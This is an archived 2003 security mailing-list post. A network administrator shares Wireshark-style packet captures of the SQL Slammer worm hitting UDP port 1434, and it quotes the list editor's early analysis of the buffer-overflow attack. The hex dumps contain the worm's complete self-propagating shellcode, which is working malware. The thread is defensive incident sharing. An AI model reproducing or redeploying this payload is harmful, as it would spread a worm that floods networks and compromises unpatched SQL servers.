Re: W32/SQLSlammer PACKET CAPTURE

From: Graham Rose (graham@AVINT.NET)
Date: 01/25/03

  • Next message: Ivan Mason: "Re: MS SQL Server Worm?"
    Date:         Sat, 25 Jan 2003 10:50:54 -0330
    From: Graham Rose <graham@AVINT.NET>
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Looks like I may have a packet capture of this. See below (IP's anonymised)
    Does anyone else have a packet capture to compare??
    Note that it looks like it's calling specific dlls and system calls

    -- 
    Graham Rose, CCNA
    Network Administrator
    Avalon InterConnect & Infotech Canada
    graham@infotechcanada.com
    graham@avint.net
    http://www.avint.net
    http://www.superweb.ca
    http://www.infotechcanada.com
    Frame 2 (418 on wire, 418 captured)
        Arrival Time: Jan 25, 2003 05:29:20.8317
        Time delta from previous packet: 0.000588 seconds
        Time relative to first packet: 0.000588 seconds
        Frame Number: 2
        Packet Length: 418 bytes
        Capture Length: 418 bytes
    Ethernet II
        Destination: 01:00:5e:28:66:b2 (01:00:5e:28:66:b2)
        Source: 00:04:75:96:e1:6e (3_96:e1:6e)
        Type: IP (0x0800)
    Internet Protocol
        Version: 4
        Header length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
            0000 00.. = Differentiated Services Codepoint: Default (0x00)
            .... ..0. = ECN-Capable Transport (ECT): 0
            .... ...0 = ECN-CE: 0
        Total Length: 404
        Identification: 0xf580
        Flags: 0x00
            .0.. = Don't fragment: Not set
            ..0. = More fragments: Not set
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (0x11)
        Header checksum: 0x6264 (correct)
        Source: xxx.xxx.xxx
        Destination: reserved-multicast-range-NOT-delegated.example.com 
    (231.40.102.178)
    User Datagram Protocol
        Source port: 1804 (1804)
        Destination port: 1434 (1434)
        Length: 384
        Checksum: 0xcdca (correct)
    Data (376 bytes)
       0  0100 5e28 66b2 0004 7596 e16e 0800 4500   ..^(f...u..n..E.
      10  0194 f580 0000 0111 6264 c6a5 4bf4 e728   ........bd..K..(
      20  66b2 070c 059a 0180 cdca 0401 0101 0101   f...............
      30  0101 0101 0101 0101 0101 0101 0101 0101   ................
      40  0101 0101 0101 0101 0101 0101 0101 0101   ................
      50  0101 0101 0101 0101 0101 0101 0101 0101   ................
      60  0101 0101 0101 0101 0101 0101 0101 0101   ................
      70  0101 0101 0101 0101 0101 0101 0101 0101   ................
      80  0101 0101 0101 0101 0101 01dc c9b0 42eb   ..............B.
      90  0e01 0101 0101 0101 70ae 4201 70ae 4290   ........p.B.p.B.
      a0  9090 9090 9090 9068 dcc9 b042 b801 0101   .......h...B....
      b0  0131 c9b1 1850 e2fd 3501 0101 0550 89e5   .1...P..5....P..
      c0  5168 2e64 6c6c 6865 6c33 3268 6b65 726e   Qh.dllhel32hkern
      d0  5168 6f75 6e74 6869 636b 4368 4765 7454   QhounthickChGetT
      e0  66b9 6c6c 5168 3332 2e64 6877 7332 5f66   f.llQh32.dhws2_f
      f0  b965 7451 6873 6f63 6b66 b974 6f51 6873   .etQhsockf.toQhs
     100  656e 64be 1810 ae42 8d45 d450 ff16 508d   end....B.E.P..P.
     110  45e0 508d 45f0 50ff 1650 be10 10ae 428b   E.P.E.P..P....B.
     120  1e8b 033d 558b ec51 7405 be1c 10ae 42ff   ...=U..Qt.....B.
     130  16ff d031 c951 5150 81f1 0301 049b 81f1   ...1.QQP........
     140  0101 0101 518d 45cc 508b 45c0 50ff 166a   ....Q.E.P.E.P..j
     150  116a 026a 02ff d050 8d45 c450 8b45 c050   .j.j...P.E.P.E.P
     160  ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d   ........<a...E..
     170  0c40 8d14 88c1 e204 01c2 c1e2 0829 c28d   .@...........)..
     180  0490 01d8 8945 b46a 108d 45b0 5031 c951   .....E.j..E.P1.Q
     190  6681 f178 0151 8d45 0350 8b45 ac50 ffd6   f..x.Q.E.P.E.P..
     1a0  ebca                                      ..
    Frame 5 (418 on wire, 418 captured)
        Arrival Time: Jan 25, 2003 05:29:20.8326
        Time delta from previous packet: 0.000141 seconds
        Time relative to first packet: 0.001447 seconds
        Frame Number: 5
        Packet Length: 418 bytes
        Capture Length: 418 bytes
    Ethernet II
        Destination: 01:00:5e:5a:09:6f (01:00:5e:5a:09:6f)
        Source: 00:04:75:96:e1:6e (3_96:e1:6e)
        Type: IP (0x0800)
    Internet Protocol
        Version: 4
        Header length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
            0000 00.. = Differentiated Services Codepoint: Default (0x00)
            .... ..0. = ECN-Capable Transport (ECT): 0
            .... ...0 = ECN-CE: 0
        Total Length: 404
        Identification: 0xf599
        Flags: 0x00
            .0.. = Don't fragment: Not set
            ..0. = More fragments: Not set
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (0x11)
        Header checksum: 0xbb5c (correct)
        Source: xxx.xxx.xxx
        Destination: 235.90.9.111
    User Datagram Protocol
        Source port: 1804 (1804)
        Destination port: 1434 (1434)
        Length: 384
        Checksum: 0x26dc (correct)
    Data (376 bytes)
       0  0100 5e5a 096f 0004 7596 e16e 0800 4500   ..^Z.o..u..n..E.
      10  0194 f599 0000 0111 bb5c c6a5 4bf4 eb5a   .........\..K..Z
      20  096f 070c 059a 0180 26dc 0401 0101 0101   .o......&.......
      30  0101 0101 0101 0101 0101 0101 0101 0101   ................
      40  0101 0101 0101 0101 0101 0101 0101 0101   ................
      50  0101 0101 0101 0101 0101 0101 0101 0101   ................
      60  0101 0101 0101 0101 0101 0101 0101 0101   ................
      70  0101 0101 0101 0101 0101 0101 0101 0101   ................
      80  0101 0101 0101 0101 0101 01dc c9b0 42eb   ..............B.
      90  0e01 0101 0101 0101 70ae 4201 70ae 4290   ........p.B.p.B.
      a0  9090 9090 9090 9068 dcc9 b042 b801 0101   .......h...B....
      b0  0131 c9b1 1850 e2fd 3501 0101 0550 89e5   .1...P..5....P..
      c0  5168 2e64 6c6c 6865 6c33 3268 6b65 726e   Qh.dllhel32hkern
      d0  5168 6f75 6e74 6869 636b 4368 4765 7454   QhounthickChGetT
      e0  66b9 6c6c 5168 3332 2e64 6877 7332 5f66   f.llQh32.dhws2_f
      f0  b965 7451 6873 6f63 6b66 b974 6f51 6873   .etQhsockf.toQhs
     100  656e 64be 1810 ae42 8d45 d450 ff16 508d   end....B.E.P..P.
     110  45e0 508d 45f0 50ff 1650 be10 10ae 428b   E.P.E.P..P....B.
     120  1e8b 033d 558b ec51 7405 be1c 10ae 42ff   ...=U..Qt.....B.
     130  16ff d031 c951 5150 81f1 0301 049b 81f1   ...1.QQP........
     140  0101 0101 518d 45cc 508b 45c0 50ff 166a   ....Q.E.P.E.P..j
     150  116a 026a 02ff d050 8d45 c450 8b45 c050   .j.j...P.E.P.E.P
     160  ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d   ........<a...E..
     170  0c40 8d14 88c1 e204 01c2 c1e2 0829 c28d   .@...........)..
     180  0490 01d8 8945 b46a 108d 45b0 5031 c951   .....E.j..E.P1.Q
     190  6681 f178 0151 8d45 0350 8b45 ac50 ffd6   f..x.Q.E.P.E.P..
     1a0  ebca                                      ..
    On January 25, 2003 09:34 am, you wrote:
    I would like to revise my previous statement.
    W32/SQLSlammer, as its being called now, does not act like SQL-Spida,
    and the mitigators to prevent SQL-Spida are not necessarily effective in
    preventing SQLSlammer.
    SQLSlammer is delivered entirely in the single connection, 367 bytes of
    attack code. It appears to be entirely memory resident, iows, it won't
    drop anything. It does not appear to take advantage of weak passwords or
    any stored procedures, it simply overflows the buffer and executes.
    Also, SQL-Spida attacked 1433, whereas this attacks UDP1434.
    If this attack is also employing the SQL Ping bounce described by David
    Litchfield last July, then this could account for the amount of
    bandwidth being consumed by this. Look in the NTBugtraq archives for
    David's email.
    There is some discussion occurring that ISPs are blocking this traffic,
    so we should see recovery relatively quickly.
    So far there have been no reports of SQL 7 or lower being affected.
    More as its available.
    Cheers,
    Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Delivery co-sponsored by TruSecure Corporation
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    TICSA - Anniversary Special - Limited Time
    Become TICSA certified for just $221.25 US when you register before 3/31/03
    with PROMO "TS0103" at www.2test.com.  NO membership fees, certification
    good for 2 years. Price for international delivery just $296.25 US, with
    this offer.  Offer cannot be combined with any other special and expires
    3/31/03. Visit www.trusecure.com/ticsa for full details.
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Delivery co-sponsored by TruSecure Corporation
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    TICSA - Anniversary Special - Limited Time
    Become TICSA certified for just $221.25 US when you register before 3/31/03
    with PROMO "TS0103" at www.2test.com.  NO membership fees, certification
    good for 2 years. Price for international delivery just $296.25 US, with
    this offer.  Offer cannot be combined with any other special and expires
    3/31/03. Visit www.trusecure.com/ticsa for full details.
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    


    Relevant Pages

    • IP protocol checksum errors
      ... Frame 3484 ... Time delta from previous packet: ... Capture Length: 254 bytes ... Fragment offset: 0 ...
      (comp.os.linux.embedded)
    • RE: Snort + (OpenBSD or Linux)
      ... Snort + (OpenBSD or Linux) ... >on the same packet. ... Regarding OpenBSD vs. Linux packet capture performance (this is a really old ...
      (Focus-IDS)
    • [TOOL] WinPcap, the Free Packet Capture Architecture for Windows
      ... the Free Packet Capture Architecture for Windows ...
      (Securiteam)
    • Re: How to go about developing a TCP Packet Filter
      ... You can modify and capture packets in LSP's, TDI filters and NDIS IM ... thus you don't know that there was an attempt to send packet. ... Volodymyr M. Shcherbyna, blog: http://www.shcherbyna.com/ ...
      (microsoft.public.win32.programmer.kernel)
    • Re: DHCP issue switching scopes
      ... Here is a text file dump of a discover/offer packet pair ... I can send the entire capture file ... Time since reference or first frame: ... User Datagram Protocol, Src Port: bootps, Dst Port: ...
      (microsoft.public.windows.server.networking)